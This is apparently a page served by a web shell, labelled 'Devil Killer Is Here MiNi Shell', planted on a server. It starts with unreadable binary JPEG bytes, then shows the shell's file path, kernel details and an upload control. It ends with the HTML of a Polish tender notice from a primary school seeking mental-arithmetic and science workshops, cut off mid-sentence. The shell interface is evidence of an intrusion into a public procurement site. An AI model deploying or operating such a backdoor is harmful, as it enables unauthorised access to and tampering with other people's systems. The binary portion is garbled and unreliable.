JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251113/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251113/0053094501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa organizacji i przeprowadzenia warsztatów/zajęć w ramach projektu„Wsparcie rozwijania kompetencji,umiejętności,uzdolnień, zainteresowań ucz. poza edukacją formalną w SzP im. BLP w Komarówce Podl </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODSTAWOWA IM. BOHATERÓW LOTNICTWA POLSKIEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000233336</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Komarówka Podlaska</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-311</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL811 - Bialski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">833535009</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrekcja@spkomarowka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spkomarowka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa organizacji i przeprowadzenia warsztatów/zajęć w ramach projektu„Wsparcie rozwijania kompetencji,umiejętności,uzdolnień, zainteresowań ucz. poza edukacją formalną w SzP im. BLP w Komarówce Podl </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2efc6e3c-6f12-4193-9de8-ea57e7325688</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00530945</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Wsparcie rozwijania kompetencji, umiejętności, uzdolnień, zainteresowań uczniów poza edukacją formalną w Szkole Podstawowej im. Bohaterów Lotnictwa Polskiego w Komarówce Podlaskiej””, realizowanego w ramach Programu Fundusze dla Lubelskiego 2021-2027, współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus, Działanie 10.3 Kształcenie ogólne Priorytetu X Lepsza Edukacja. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2efc6e3c-6f12-4193-9de8-ea57e7325688 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-2efc6e3c-6f12-4193-9de8-ea57e7325688</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.4.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie <br/>e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów <br/>oraz zasady i warunki korzystania z Platformy e-Zamówienia określa <br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>11.5.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania do Platformy e-Zamówienia.<br/>11.6.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>11.7.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia , o którym mowa w pkt 11.6 SWZ, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych danych (zamawiający dopuszcza także format RAR) i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>11.8.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, o którym mowa w pkt 11.6 SWZ, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a)	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (zamawiający dopuszcza także format RAR) z uwzględnieniem rodzaju przekazywanych danych (i przekazuje się jako załącznik), <br/>lub<br/>b)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>11.9.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t. j. Dz. U. z 2022 r., poz. 1233), Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>13.4.	Ofertę składa się, pod rygorem nieważności, w formie elektronicznejlub <br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistymw formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t. j. Dz. U. z 2024 r., poz. 1557), <br/>z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, <br/>z uwzględnieniem rodzaju przekazywanych danych. Zamawiający preferuje <br/>w szczególności następujące formaty przesłanych danych: .pdf, .docx, zip. (Zamawiający dopuszcza także format RAR).<br/>Pozostałe informacje zostały opisane w rozdziale 11 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu <br/>takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,Zamawiający <br/>informuje, że: <br/>1)	jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2)	dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. cRODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>na zadanie pn.: Usługa organizacji i przeprowadzenia warsztatów/ zajęć w ramach projektu pn. „Wsparcie rozwijania kompetencji, umiejętności, uzdolnień, zainteresowań uczniów poza edukacją formalną w Szkole Podstawowej im. Bohaterów Lotnictwa Polskiego w Komarówce Podlaskiej”prowadzonym w trybie podstawowym na podstawie art. 275 pkt. 1) ustawy Pzp.<br/>3)	odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>4)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>5)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6)	w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>7)	Wykonawca posiada:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>−	na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia <br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8)	Wykonawcy nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO. <br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresie niezgodnym <br/>z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania <br/>o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP.351.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest usługa organizacji i przeprowadzenia warsztatów/zajęć w ramach projektu pn. „Wsparcie rozwijania kompetencji, umiejętności, uzdolnień, zainteresowań uczniów poza edukacją formalną w Szkole Podstawowej im. Bohaterów Lotnictwa Polskiego w Komarówce Podlaskiej” w siedzibie Zamawiającego.<br/><br/>4.2.1. część 1 zamówienia – „Zajęcia z arytmetyki mentalnej”<br/>Dla 2 grup po 8 os./gr (uczniowie klas I-III, łącznie 16 uczniów ) x 1h (po 60 minut)/tydzień x 30 tygodni x 2 lata = 120 h do zrealizowania w okresie od 12.11.2025 do 26.06.2027 w tym:<br/>•	60 h w terminie 12.11.2025 – 27.06.2026 <br/>•	60 h w terminie 15.09.2026 – 26.06. 2027<br/><br/>Prowadzone warsztaty będą wspomagały zrównoważony rozwój twórczych<br/> i intelektualnych zdolności uczniów. Będą polegały na harmonijnym rozwijaniu i stymulowaniu obu półkul mózgu. Dzięki warsztatom uczniowie nabędą umiejętność dokonywania szybkich obliczeń w pamięci oraz poprawią pamięć słuchową, wzrokową, poprawią uwagę i skupienie, logikę i nieszablonowe myślenie. Ćwiczenia w ramach zajęć stymulują interakcje pomiędzy obiema półkulami mózgu.<br/><br/>Wykonawca zobowiązany jest zapewnić uczniom niezbędne pomoce do zajęć z arytmetyki mentalnej w postaci zestawu składającego się z podręcznika, zeszytu obliczeń, książki oceny postępów ucznia, liczydła wraz z dostępem do platformy ćwiczeniowej w liczbie 32 zestawów oraz zapewnić licencję do prowadzenia zajęć w Szkole Podstawowej im. Bohaterów lotnictwa Polskiego w Komarówce Podlaskiej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">22830000-7 - Zeszyty ćwiczeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-06-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1	Zamawiający dokona oceny ofert, w zakresie części 1-2, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>Lp. Nazwa kryterium Znaczenie kryterium (w %)<br/>1 Cena (Pc) 97<br/>2 Kryterium społeczne (Ps) 3<br/>Razem: 100<br/><br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/><br/><br/>17.2	Punkty za kryterium Cena (Pc) zostaną obliczone według wzoru:<br/><br/>Pc = (Cn / Cb) x 97<br/><br/> gdzie:<br/>Pc- ilość punktów za kryterium cena,<br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>Cb – cena oferty badanej.<br/><br/>W kryterium Cena (Pc), oferta z najniższą ceną otrzyma 97 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>17.3	Punkty za kryterium Kryterium społeczne (Ps)<br/>Nazwa: oddelegowanie do realizacji zamówienia osoby niepełnosprawnej.<br/>Cel środowiskowy: Aktywizacja zawodowa osób z grup społecznie marginalizowanych.<br/>Opis: Wykonawca uzyska dodatkowe punkty, jeśli zatrudni lub oddeleguje osobę z niepełnosprawnością (minimum jedną) do realizacji przedmiotowego zamówienia na podstawie umowy o pracę.<br/>Zasady przyznawania punktów:<br/>a) jeżeli Wykonawca zobowiąże się, że zatrudni lub oddeleguje do wykonywania zamówienia osobę z niepełnosprawnością w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (t. j. Dz. U. z 2024 r., poz. 44) do realizacji przedmiotowego zamówienia na podstawie umowy o pracę otrzyma 3 pkt.<br/>b) jeżeli Wykonawca nie zobowiąże się, że zatrudni lub oddeleguje do wykonywania zamówienia osobę z niepełnosprawnością w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społeczne zatrudnianiu osób niepełnosprawnych (t. j. Dz. U. z 2024 r., poz. 44) do realizacji przedmiotowego zamówienia na podstawie umowy o pracę otrzyma 0 pkt.<br/><br/>17.4	Jako najkorzystniejszą ofertę w danej części zamówienia Zamawiający wybierze ofertę, spośród ofert nie podlegających odrzuceniu, która uzyska największą liczbę punktów (P), obliczoną wg następującego wzoru: P = Pc +Ps<br/>gdzie:<br/>P - ocena końcowa ocenionej (badanej) oferty,<br/>Pc - ilość punktów uzyskanych przez ocenianą ofertę w kryterium Cena (Pc).<br/>Ps - ilość punktów uzyskanych przez ocenianą ofertę w kryterium społecznym (Ps).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">97</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">17.3 Punkty za kryterium Kryterium społeczne (Ps) Nazwa: oddelegowanie do realizacji zamówienia osoby niepełnosprawnej. Cel środowiskowy: Aktywizacja zawodowa osób z grup społecznie marginalizowanych. Opis: Wykonawca uzyska dodatkowe punkty, jeśli zatrudni lub oddeleguje osobę z niepełnosprawnością (minimum jedną) do realizacji przedmiotowego zamówienia na podstawie umowy o pracę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiotem zamówienia jest usługa organizacji i przeprowadzenia warsztatów/zajęć w ramach projektu pn. „Wsparcie rozwijania kompetencji, umiejętności, uzdolnień, zainteresowań uczniów poza edukacją formalną w Szkole Podstawowej im. Bohaterów Lotnictwa Polskiego w Komarówce Podlaskiej” w siedzibie Zamawiającego.<br/>4.2.2. część 2 zamówienia - „Warsztaty” w tym:<br/><br/>	a) warsztaty ekologiczne<br/><br/>Po 1 warsztacie po 45 minut dla 2 grup po 20 os. (łącznie 40os., kl. 1-8) w roku 2025/2026 i po 1 warsztacie po 45 minut dla 2 grup po 20 os. (łącznie 40os,. kl. 1-8) w roku 2026/2027, łączna liczba warsztatów do zrealizowania w okresie od 12.11.2025 do 26.06.2027 – 4 warsztaty.<br/><br/>Warsztaty mają zawierać ćwiczenia angażujące uczniów do poznawania świata roślin, przybliżające zagadnienia recyklingu, odnawialnych źródeł energii, zagadnienia związane z zieloną transformacją oraz jak nieprawidłowe zachowania wpływają na środowisko naturalne. Uczniowie wykorzystają materiały pochodzące z recyklingu do wykonania wyrobu rękodzielniczego. Dzięki warsztatom zwiększą wiedzę na temat ekologii i zagadnień związanych z ochroną środowiska. <br/><br/>b) Warsztaty naukowe „Szalony naukowiec”<br/><br/>Po 1 warsztacie po 45 minut dla 2 grup po 20 os. (łącznie 40os.) w roku 2025/2026 i po 1 warsztacie po 45 minut dla 2 grup po 20 os. (łącznie 40os.) w roku 2026/2027, łączna liczba warsztatów do zrealizowania w okresie od 12.11.2025 do 26.06.2027 – 4 warsztaty.<br/><br/>Warsztaty będą polegały na wykonywaniu eksperymentów chemicznych i fizycznych 